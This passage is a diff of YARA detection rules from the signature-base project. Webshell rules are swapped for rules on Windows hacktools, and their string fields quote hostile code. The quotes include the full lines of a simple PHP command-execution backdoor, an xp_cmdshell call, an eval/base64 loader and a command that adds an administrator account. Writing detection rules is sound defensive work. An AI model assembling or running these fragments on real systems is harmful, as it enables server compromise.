+		$s0 = "[Usage]:  %s <HostName|IP> <UserName> <Password>" fullword ascii
+		$s1 = "=============By uhhuhy(Feb 18,2003) - http://www.cnhonker.net=============" fullword ascii
+		$s4 = "Cool! Connected to SQL server on %s successfully!" fullword ascii
+		$s5 = "EXEC master..xp_cmdshell \"%s\"" fullword ascii
+		$s6 = "=======================Sqlcmd v0.21 For HScan v1.20=======================" fullword ascii
+		$s10 = "Error,exit!" fullword ascii
+		$s11 = "Sqlcmd>" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and 3 of them
 }
-rule SIGNATURE_BASE_Webshell_Ru24_Post_Sh
+rule SIGNATURE_BASE_Sword1_5 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file ru24_post_sh.php"
+		description = "Chinese Hacktool Set - file Sword1.5.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "86a45d72-c42d-58d5-9969-d3ebfc22853d"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5950-L5965"
+		id = "dff8666a-0373-5605-9012-92b2b3ec71ea"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1430-L1449"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d2c18766a1cd4dda928c12ff7b519578ccec0769"
-		logic_hash = "6cf15a67c311979d32edfb443701cef34ee32d7a672314fc7b60b262b6b2c402"
+		hash = "96ee5c98e982aa8ed92cb4cedb85c7fda873740f"
+		logic_hash = "09e09f7ea16dc917388cbccb22a7abfed9b693a33d61698f0e838f029402c256"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "http://www.ru24-team.net" fullword
-		$s4 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a"
-		$s6 = "Ru24PostWebShell"
-		$s7 = "Writed by DreAmeRz" fullword
-		$s9 = "$function=passthru; // system, exec, cmd" fullword
+		$s3 = "http://www.ip138.com/ip2city.asp" fullword wide
+		$s4 = "http://www.md5decrypter.co.uk/feed/api.aspx?" fullword wide
+		$s6 = "ListBox_Command" fullword wide
+		$s13 = "md=7fef6171469e80d32c0559f88b377245&submit=MD5+Crack" fullword wide
+		$s18 = "\\Set.ini" wide
+		$s19 = "OpenFileDialog1" fullword wide
+		$s20 = " (*.txt)|*.txt" fullword wide
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 4 of them
 }
-rule SIGNATURE_BASE_Webshell_Hiddens_Shell_V1
+rule SIGNATURE_BASE_Tools_Scan : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file hiddens shell v1.php"
+		description = "Chinese Hacktool Set - file scan.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7194998e-c84c-5f59-92fe-857ecf7e8e88"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5966-L5977"
+		id = "4601d4d0-2b7e-5937-87b6-df80ab373752"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1451-L1466"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1674bd40eb98b48427c547bf9143aa7fbe2f4a59"
-		logic_hash = "b76400c320e6294b0c831fbbb8e08a9d2097fbb027065f9c4b496d4b005ba016"
+		hash = "c580a0cc41997e840d2c0f83962e7f8b636a5a13"
+		logic_hash = "d8bf2e4a4634f74ce548a5824090502f2ccef382bdbcaf795df711e88a325912"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 81
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U"
+		$s2 = "Shanlu Studio" fullword wide
+		$s3 = "_AutoAttackMain" fullword ascii
+		$s4 = "_frmIpToAddr" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_C99_Madnet
+rule SIGNATURE_BASE_Dos_C : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file c99_madnet.php"
+		description = "Chinese Hacktool Set - file c.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f2b9c3d1-1c55-59cb-a9bf-8b4011f86a3b"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5978-L5993"
+		id = "2e8319de-fe54-5083-968c-4707d127f072"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1468-L1487"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "17613df393d0a99fd5bea18b2d4707f566cff219"
-		logic_hash = "cd4048f28405f106302643656ae5f8a257aaec0184a8057a9dffbda9bb857027"
+		hash = "3deb6bd52fdac6d5a3e9a91c585d67820ab4df78"
+		logic_hash = "2865b50e6a323462fab39bd84571939c618cf6f00e147039f6e699ba4d195a00"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$md5_pass = \"\"; //If no pass then hash" fullword
-		$s1 = "eval(gzinflate(base64_decode('"
-		$s2 = "$pass = \"pass\";  //Pass" fullword
-		$s3 = "$login = \"user\"; //Login" fullword
-		$s4 = "             //Authentication" fullword
+		$s0 = "!Win32 .EXE." fullword ascii
+		$s1 = ".MPRESS1" fullword ascii
+		$s2 = ".MPRESS2" fullword ascii
+		$s3 = "XOLEHLP.dll" fullword ascii
+		$s4 = "</body></html>" fullword ascii
+		$s8 = "DtcGetTransactionManagerExA" fullword ascii
+		$s9 = "GetUserNameA" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_C99_Locus7S
+rule SIGNATURE_BASE_Arpsniffer : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file c99_locus7s.php"
+		description = "Chinese Hacktool Set - file arpsniffer.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f92fe5a2-e465-56ed-a77b-b32ea4c2c105"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5994-L6009"
+		id = "78db3b18-008a-5a4e-9504-0cbe3b852046"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1489-L1506"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d413d4700daed07561c9f95e1468fb80238fbf3c"
-		logic_hash = "5ecfc5f6da471bd3037228c0bc762d50762933af3cf6674210c7b2017a45a646"
+		hash = "7d8753f56fc48413fc68102cff34b6583cb0066c"
+		logic_hash = "eb0a425be0fff87eb58689a4eee4b6729e8ee985e6224790111322d4b182caf1"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s8 = "$encoded = base64_encode(file_get_contents($d.$f)); " fullword
-		$s9 = "$file = $tmpdir.\"dump_\".getenv(\"SERVER_NAME\").\"_\".$db.\"_\".date(\"d-m-Y"
-		$s10 = "else {$tmp = htmlspecialchars(\"./dump_\".getenv(\"SERVER_NAME\").\"_\".$sq"
-		$s11 = "$c99sh_sourcesurl = \"http://locus7s.com/\"; //Sources-server " fullword
-		$s19 = "$nixpwdperpage = 100; // Get first N lines from /etc/passwd " fullword
+		$s1 = "SHELL" ascii
+		$s2 = "PacketSendPacket" fullword ascii
+		$s3 = "ArpSniff" ascii
+		$s4 = "pcap_loop" fullword ascii
+		$s5 = "packet.dll" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 120KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Jspwebshell_1_2
+rule SIGNATURE_BASE_Pw_Inspector_2 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file JspWebshell_1.2.php"
+		description = "Chinese Hacktool Set - file pw-inspector.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dfd8c88d-4fe2-5786-9d71-65dba525c358"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6010-L6026"
+		id = "795c7009-93a8-57c4-8554-f0ed5c1d50f8"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1508-L1524"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0bed4a1966117dd872ac9e8dceceb54024a030fa"
-		logic_hash = "13e696c1c671d7fda832c84f150e3f41ed55bf888c4bebfeb06ea68d6be65527"
+		hash = "e0a1117ee4a29bb4cf43e3a80fb9eaa63bb377bf"
+		logic_hash = "7d2021ff471f03deb9e6d8b62fcb218ae3198f21fd7b8fa1fdd9b96228b8c2f8"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword
-		$s1 = "String password=request.getParameter(\"password\");" fullword
-		$s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java."
-		$s7 = "String editfile=request.getParameter(\"editfile\");" fullword
-		$s8 = "//String tempfilename=request.getParameter(\"file\");" fullword
-		$s12 = "password = (String)session.getAttribute(\"password\");" fullword
+		$s1 = "Use for hacking: trim your dictionary file to the pw requirements of the target." fullword ascii
+		$s2 = "Syntax: %s [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p " ascii
+		$s3 = "PW-Inspector" fullword ascii
+		$s4 = "i:o:m:M:c:lunps" fullword ascii
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
 }
-rule SIGNATURE_BASE_Webshell_Safe0Ver
+rule SIGNATURE_BASE_Datpcshare : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file safe0ver.php"
+		description = "Chinese Hacktool Set - file datPcShare.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a7fc8c89-f7a1-5958-823a-763dedb3066d"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6027-L6044"
+		id = "1bf44c0d-6aa7-5486-baee-c17d3e82403f"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1526-L1542"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "366639526d92bd38ff7218b8539ac0f154190eb8"
-		logic_hash = "ae5de63b79804cf8c99bc5ea0c8862cf05e4085451d2b516cf95565bf32f3876"
+		hash = "87acb649ab0d33c62e27ea83241caa43144fc1c4"
+		logic_hash = "15297a8019192371032fc11b966d1a89d951c176da6d64e80ca5a201f55341c0"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "$scriptident = \"$scriptTitle By Evilc0der.com\";" fullword
-		$s4 = "while (file_exists(\"$lastdir/newfile$i.txt\"))" fullword
-		$s5 = "else { /* <!-- Then it must be a File... --> */" fullword
-		$s7 = "$contents .= htmlentities( $line ) ;" fullword
-		$s8 = "<br><p><br>Safe Mode ByPAss<p><form method=\"POST\">" fullword
-		$s14 = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword
-		$s20 = "/* <!-- End of Actions --> */" fullword
+		$s1 = "PcShare.EXE" fullword wide
+		$s2 = "MZKERNEL32.DLL" fullword ascii
+		$s3 = "PcShare" fullword wide
+		$s4 = "QQ:4564405" fullword wide
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Uploader
+rule SIGNATURE_BASE_Tools_Xport : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file Uploader.php"
+		description = "Chinese Hacktool Set - file xport.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c68e15d9-865e-5269-a91c-00619fe76305"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6045-L6056"
+		id = "3223fe5b-6135-5530-a5eb-10c44f3f6277"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1544-L1565"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e216c5863a23fde8a449c31660fd413d77cce0b7"
-		logic_hash = "c4b915f60a952131caa2c4f5bb2eea85ef25f27cabb8ad36a6bb928433558954"
+		hash = "9584de562e7f8185f721e94ee3cceac60db26dda"
+		logic_hash = "9eea73732643f74b4802af0672f5c3ab09cc54cfecd80f8903efc26b7ceaec29"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
+		$s1 = "Match operate system failed, 0x%00004X:%u:%d(Window:TTL:DF)" fullword ascii
+		$s2 = "Example: xport www.xxx.com 80 -m syn" fullword ascii
+		$s3 = "%s - command line port scanner" fullword ascii
+		$s4 = "xport 192.168.1.1 1-1024 -t 200 -v" fullword ascii
+		$s5 = "Usage: xport <Host> <Ports Scope> [Options]" fullword ascii
+		$s6 = ".\\port.ini" fullword ascii
+		$s7 = "Port scan complete, total %d port, %d port is opened, use %d ms." fullword ascii
+		$s8 = "Code by glacier <glacier@xfocus.org>" fullword ascii
+		$s9 = "http://www.xfocus.org" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Kral
+rule SIGNATURE_BASE_Pc_Xai : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file kral.php"
+		description = "Chinese Hacktool Set - file xai.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6057-L6073"
+		id = "dcf1b57b-3616-5198-bd57-18505fee91ae"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1567-L1586"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4cd1d1a2fd448cecc605970e3a89f3c2e5c80dfc"
-		logic_hash = "0aded226f4e54c0169b9fbda91458f581ea47f9f8bda61a350b5e6f8b60931f3"
+		hash = "f285a59fd931ce137c08bd1f0dae858cc2486491"
+		logic_hash = "80659fcf1721b20f459ac0480401bdf643c95b46118d03320bc6d4e4ee4b67f7"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 60
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$adres=gethostbyname($ip);" fullword
-		$s3 = "curl_setopt($ch,CURLOPT_POSTFIELDS,\"domain=\".$site);" fullword
-		$s4 = "$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";" fullword
-		$s16 = "echo $son.' <br> <font color=\"green\">Access</font><br>';" fullword
-		$s17 = "<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">BLaSTER</a><br /"
-		$s20 = "<p><strong>Server listeleyici</strong><br />" fullword
+		$s1 = "Powered by CoolDiyer @ C.Rufus Security Team 05/19/2008  http://www.xcodez.com/" fullword wide
+		$s2 = "%SystemRoot%\\System32\\" ascii
+		$s3 = "%APPDATA%\\" ascii
+		$s4 = "---- C.Rufus Security Team ----" fullword wide
+		$s5 = "www.snzzkz.com" fullword wide
+		$s6 = "%CommonProgramFiles%\\" ascii
+		$s7 = "GetRand.dll" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Cgitelnet
+rule SIGNATURE_BASE_Radmin_Hash : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file cgitelnet.php"
+		description = "Chinese Hacktool Set - file Radmin_Hash.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b02d8549-ebfe-522c-9a6d-8657273da3ed"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6074-L6088"
+		id = "07761e81-15b4-5639-b766-8dc3f16e2b7a"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1588-L1605"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "72e5f0e4cd438e47b6454de297267770a36cbeb3"
-		logic_hash = "e9b7096d5a19c9d5423bbfe125ae0347853919ab092efa98f0687a5d0cf68953"
+		hash = "be407bd5bf5bcd51d38d1308e17a1731cd52f66b"
+		logic_hash = "d6ee13a2ed30bb44471593386521f67be0d6ccd6f8a0ebf8557012a099f81d3d"
 		score = 75
-		quality = 60
-		tags = ""
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s9 = "# Author Homepage: http://www.rohitab.com/" fullword
-		$s10 = "elsif($Action eq \"command\") # user wants to run a command" fullword
-		$s18 = "# in a command line on Windows NT." fullword
-		$s20 = "print \"Transfered $TargetFileSize Bytes.<br>\";" fullword
+		$s1 = "<description>IEBars</description>" fullword ascii
+		$s2 = "PECompact2" fullword ascii
+		$s3 = "Radmin, Remote Administrator" fullword wide
+		$s4 = "Radmin 3.0 Hash " fullword wide
+		$s5 = "HASH1.0" fullword wide
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Simple_Backdoor_2
+rule SIGNATURE_BASE_Oseditor : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file simple-backdoor.php"
+		description = "Chinese Hacktool Set - file OSEditor.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "faddd38e-d0c6-5299-9983-53351af1ece5"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		old_rule_name = "WebShell_simple_backdoor"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6089-L6109"
+		id = "b308852c-3436-5748-9ba6-82d4c3c5fc14"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1607-L1624"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "edcd5157a68fa00723a506ca86d6cbb8884ef512"
-		logic_hash = "655e445e51ec0f1bdce006a72acf3bce95941a349c279c14768760fa9f6f9d76"
+		hash = "6773c3c6575cf9cfedbb772f3476bb999d09403d"
+		logic_hash = "6531c0b3c0f6123d9eda34ed028f05054e4805e5c329da4b29e4f37f9b5fc1b2"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword
-		$s1 = "<!--    http://michaeldaw.org   2006    -->" fullword
-		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
-		$s3 = "        echo \"</pre>\";" fullword
-		$s4 = "        $cmd = ($_REQUEST['cmd']);" fullword
-		$s5 = "        echo \"<pre>\";" fullword
-		$s6 = "if(isset($_REQUEST['cmd'])){" fullword
-		$s7 = "        die;" fullword
-		$s8 = "        system($cmd);" fullword
+		$s1 = "OSEditor.exe" fullword wide
+		$s2 = "netsafe" wide
+		$s3 = "OSC Editor" fullword wide
+		$s4 = "GIF89" ascii
+		$s5 = "Unlock" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Safe_Mode_Bypass_PHP_4_4_2_And_PHP_5_1_2_2
+rule SIGNATURE_BASE_Goodtoolset_Ms11011 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php"
+		description = "Chinese Hacktool Set - file ms11011.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a504442f-85f2-55a1-8a07-1e0faccf8bc0"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6110-L6124"
+		id = "689b7ea3-6707-5f99-8232-438d903d414d"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1626-L1642"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8fdd4e0e87c044177e9e1c97084eb5b18e2f1c25"
-		logic_hash = "fbe1f77e00fbc4e58cbad564e2d96c0381765ac799dfdf6cc2580428c68f97a5"
+		hash = "5ad7a4962acbb6b0e3b73d77385eb91feb88b386"
+		logic_hash = "99dd27eba7da44c71098446e17abfe626de91e899e28c2d2e99e7b54b9e0c825"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword
-		$s3 = "xb5@hotmail.com</FONT></CENTER></B>\");" fullword
-		$s4 = "$v = @ini_get(\"open_basedir\");" fullword
-		$s6 = "by PHP Emperor<xb5@hotmail.com>" fullword
+		$s0 = "\\i386\\Hello.pdb" ascii
+		$s1 = "OS not supported." fullword ascii
+		$s3 = "Not supported." fullword wide
+		$s4 = "SystemDefaultEUDCFont" fullword wide
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Ntdaddy_V1_9
+rule SIGNATURE_BASE_Freeversion_Release : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file NTDaddy v1.9.php"
+		description = "Chinese Hacktool Set - file release.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a175fd28-5dc2-5827-87f0-4117e889e90e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6125-L6139"
+		id = "1a603634-a00a-5f8b-a47d-c3c8065a5c3e"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1644-L1662"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "79519aa407fff72b7510c6a63c877f2e07d7554b"
-		logic_hash = "fdf8b4bb4980e588ad5ccee2d047660980d39f38617f887c5762dcdb0b858267"
+		hash = "f42e4b5748e92f7a450eb49fc89d6859f4afcebb"
+		logic_hash = "38722afb3b955aced2e68e2048a3268722524f61784dcb45c6a695b5684230eb"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "|     -obzerve : mr_o@ihateclowns.com |" fullword
-		$s6 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword
-		$s13 = "<form action=ntdaddy.asp method=post>" fullword
-		$s17 = "response.write(\"<ERROR: THIS IS NOT A TEXT FILE>\")" fullword
+		$s1 = "-->Got WMI process Pid: %d " ascii
+		$s2 = "This exploit will execute \"net user " ascii
+		$s3 = "net user temp 123456 /add & net localgroup administrators temp /add" fullword ascii
+		$s4 = "Running reverse shell" ascii
+		$s5 = "wmiprvse.exe" fullword ascii
+		$s6 = "SELECT * FROM IIsWebInfo" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 3 of them
 }
-rule SIGNATURE_BASE_Webshell_Lamashell
+rule SIGNATURE_BASE_Churrasco : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file lamashell.php"
+		description = "Chinese Hacktool Set - file churrasco.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "60e39eed-baa2-5999-8560-0a0242ce2608"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6140-L6156"
+		id = "99cb5a7a-85c1-57f5-b5b6-f0b1092e1e06"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1664-L1681"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b71181e0d899b2b07bc55aebb27da6706ea1b560"
-		logic_hash = "e58dbd6b9c65a139828890a3fadfad9031580fe189066489d266d37d7078ad98"
+		hash = "a8d4c177948a8e60d63de9d0ed948c50d0151364"
+		logic_hash = "36ca7c8d1579eeb571c182c033c312b3b231313b8950c1e24eeb3df793b004c4"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
